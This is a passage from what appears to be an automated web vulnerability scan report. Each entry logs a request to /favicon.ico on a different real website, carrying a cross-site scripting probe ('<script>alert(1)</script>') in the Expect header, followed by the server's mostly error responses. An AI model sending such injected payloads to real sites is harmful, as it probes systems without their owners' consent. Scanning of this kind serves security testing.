GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greetingsisland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:45 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.134. http://www.gtanet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gtanet.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gtanet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:00:40 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

29.135. http://www.guesssms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guesssms.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guesssms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:33:03 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-207.97.255.200-GSS-WWW=1845602496.20480.0000; path=/

The page cannot be displayed because the expectation failed.

29.136. http://www.gulfshores.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gulfshores.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gulfshores.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:19:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.137. http://www.gypsyteenz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gypsyteenz.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gypsyteenz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 04:20:34 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.138. http://www.hairymature.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairymature.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairymature.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.1
Date: Wed, 04 May 2011 03:42:07 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

29.139. http://www.hairyoldmature.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairyoldmature.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyoldmature.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.1
Date: Wed, 04 May 2011 02:06:20 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

29.140. http://www.heartdetectives.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartdetectives.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heartdetectives.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:38:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

29.141. http://www.hellohouston.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellohouston.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellohouston.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 02:24:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.142. http://www.hellolosangeles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellolosangeles.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellolosangeles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:41:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.143. http://www.hellolouisville.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellolouisville.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hellolouisville.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 00:54:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.144. http://www.hinduwebsite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hinduwebsite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hinduwebsite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:56:45 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.145. http://www.hk.vg/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hk.vg
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hk.vg
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 03:16:32 GMT
Server: Apache

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.146. http://www.hmshost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hmshost.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hmshost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:40:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.147. http://www.homefurnitureshowroom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homefurnitureshowroom.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homefurnitureshowroom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 294
Expires: Wed, 04 May 2011 02:50:31 GMT
Date: Wed, 04 May 2011 02:50:31 GMT
Connection: close

<HTML><HEAD>
<TITLE>Access Denied</TITLE>
</HEAD><BODY>
<H1>Access Denied</H1>

You don't have permission to access "http&#58;&#47;&#47;www&#46;homefurnitureshowroom&#46;com&#47;favicon&#46;ico" on t
...[SNIP]...

29.148. http://www.hoosiertopics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoosiertopics.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hoosiertopics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Wed, 04 May 2011 01:38:34 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

29.149. http://www.hotteentube.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotteentube.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotteentube.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Wed, 04 May 2011 03:04:05 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

29.150. http://www.hugeandnatural.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hugeandnatural.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hugeandnatural.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 02:16:32 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.151. http://www.humortank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.humortank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.humortank.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:24:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.152. http://www.iberiabank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iberiabank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iberiabank.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 02:07:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.153. http://www.ihireconstruction.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ihireconstruction.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihireconstruction.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 103
Date: Wed, 04 May 2011 01:45:09 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.154. http://www.ihirelogistics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ihirelogistics.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihirelogistics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-SERVED-BY: 110
Date: Wed, 04 May 2011 01:10:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.155. http://www.ihs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ihs.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:37:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.156. http://www.illinoisproperty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.illinoisproperty.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.illinoisproperty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:07:46 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.157. http://www.inforotor.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inforotor.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inforotor.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:09:08 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.158. http://www.interfacexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interfacexpress.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.interfacexpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"282-1304422644000"
Last-Modified: Tue, 03 May 2011 11:37:24 GMT
Content-Type: text/html
Content-Length: 282
Date: Wed, 04 May 2011 01:43:08 GMT

<html>
<head>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="EXPIRES" CONTENT="Mon, 22 Jul 1980 11:12:01 GMT">
</head>
<body
...[SNIP]...

29.159. http://www.ireland.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ireland.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ireland.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:19:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.160. http://www.ixitools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ixitools.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ixitools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 02:53:37 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.161. http://www.jailtojob.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jailtojob.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jailtojob.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:58:13 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:01:12 GMT
ETag: "169bb0d-4e4-486ced93a17fb"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>
   
   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.162. http://www.jobilephones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobilephones.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobilephones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 00:50:51 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

29.163. http://www.jwu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jwu.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jwu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:53:15 GMT
Content-Length: 319

<!-- beginning of HttpRedirect.htm file -->
<script type="text/javascript">
function redirectToHttps()
{
var httpURL = window.location.hostname + window.location.pathname;
var httpsURL = "https:/
...[SNIP]...

29.164. http://www.kansasworks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansasworks.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kansasworks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:22:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.165. http://www.kgoam810.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kgoam810.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kgoam810.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 72
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDAQSSAAQC=JKGKHNDAMECAHBDGPOLOHLAJ; path=/
Cache-control: private
Set-Cookie: NSC_LHP=ffffffff09021f3045525d5f4f58455e445a4a42222f;path=/

<br>Error, file not found: 404;http://www.kgoam810.com:5151/favicon.ico

29.166. http://www.kimt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimt.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kimt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:30 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n31.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:11:30 GMT
Age: 0
Content-Length: 1454
Content-Type: text/html
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

29.167. http://www.kjmagnetics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kjmagnetics.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kjmagnetics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.168. http://www.kluji.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kluji.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kluji.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:54:54 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.169. http://www.lead411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lead411.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lead411.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Accept-Encoding: gzip
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:08:07 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.170. http://www.leadrotation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leadrotation.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leadrotation.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.171. http://www.learn2grow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learn2grow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.learn2grow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.172. http://www.leeannwomack.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leeannwomack.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leeannwomack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.173. http://www.leech.it/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leech.it
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leech.it
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 01:19:28 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.174. http://www.leggs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leggs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
